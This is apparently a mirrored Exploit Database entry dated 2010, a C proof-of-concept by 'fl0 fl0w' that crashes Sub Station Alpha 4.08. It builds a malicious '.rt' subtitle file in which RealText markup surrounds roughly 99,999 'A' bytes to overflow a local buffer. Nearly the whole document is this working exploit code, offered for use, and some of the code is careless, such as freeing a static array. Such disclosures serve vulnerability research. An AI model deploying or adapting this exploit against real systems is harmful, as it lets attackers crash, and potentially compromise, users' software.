Sub Station Alpha 4.08 – ‘.rt’ Local Buffer Overflow (PoC)

Exploit Database
173 阅读

作者： fl0 fl0w

日期： 2010-01-15
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/11149/

100

101

/*Sub Station Alpha v4.08 .rt file local buffer overflow poc

by fl0 fl0w*/

#include <string.h>

#include <stdio.h>

#define FIL3 "testfile.rt"

char header[]=

{

"\x3C\x77\x69\x6E\x64\x6F\x77\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x32\x35\x30\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x33\x30"

"\x30\x22\x20\x64\x75\x72\x61\x74\x69\x6F\x6E\x3D\x22\x31\x35\x22\x20\x62\x67\x63\x6F\x6C\x6F\x72\x3D\x22\x79\x65\x6C\x6C"

"\x6F\x77\x22\x3E\x0D\x0A\x4D\x61\x72\x79\x20\x68\x61\x64\x20\x61\x20\x6C\x69\x74\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D"

"\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69\x6E\x3D\x22" //header 109 bytes

};

char tail[]=

{

//junk

"\x22\x2F\x3E\x0D\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69\x6E\x3D\x22\x36\x22\x2F\x3E\x6C\x69\x74"

"\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69\x6E\x3D\x22\x39"

"\x22\x2F\x3E\x4D\x61\x72\x79\x20\x68\x61\x64\x20\x61\x20\x6C\x69\x74\x74\x6C\x65\x20\x6C\x61\x6D\x62\x0D\x0A\x3C\x62\x72"

"\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69\x6E\x3D\x22\x31\x32\x22\x2F\x3E\x77\x68\x6F\x73\x65\x20\x66\x6C\x65\x65"

"\x63\x65\x20\x77\x61\x73\x20\x77\x68\x69\x74\x65\x20\x61\x73\x20\x73\x6E\x6F\x77\x2E\x0D\x0A\x3C\x2F\x77\x69\x6E\x64\x6F"

"\x77\x3E\x0D\x0A"//tail 154 bytes

};

char banner[]=

{

"***********************************************************\n"

"Sub Station Alpha v4.08 .rt file local buffer overflow poc*\n"

" by fl0 fl0w*\n"

"***********************************************************\n"

};

/*--------prototypes------*/

int cpy(char*,char*,int);

int cpystr(char*,int,int,int);

void print(char*);

unsigned int getFsize(FILE*,char*);

/*-----extern var--------*/

char b[1000000];

char *size;

char junk[1000000];

/*--------main---------------*/

int main()

{

printf("%s",banner);

print("Starting sploit");

memset(junk,0x41,99999);

buildf(FIL3);

print("File done!");

getchar();

return 0;

}

int buildf(char* fname)

{

FILE* fp=fopen(fname,"wb");

if(fp==NULL)

{

print("File writing error");

exit(0);

}

fprintf(fp,"%s%s%s",header,junk,tail);

printf("[!]File is %d bytes",getFsize(fp,FIL3));

fclose(fp);

free(b);

return 0;

}

unsigned int getFsize(FILE* g,char* gname)

{

unsigned int s;

g=fopen(gname,"rb");

if(g==NULL)

{

print("File error at reading");

exit(0);

}

fseek(g,0,SEEK_END);

s=ftell(g);

return s;

}

int cpy(char* source,char* dest,int offset)

{

int len;

len=strlen(source);

memcpy(dest+offset,source,len+1);

return len;

}

int cpystr(char* dest,int str,int len,int offset)

{

memset(dest+offset,str,len+1);

return len;

}

void print(char* msg)

{

printf("\n[*]%s\n",msg);

}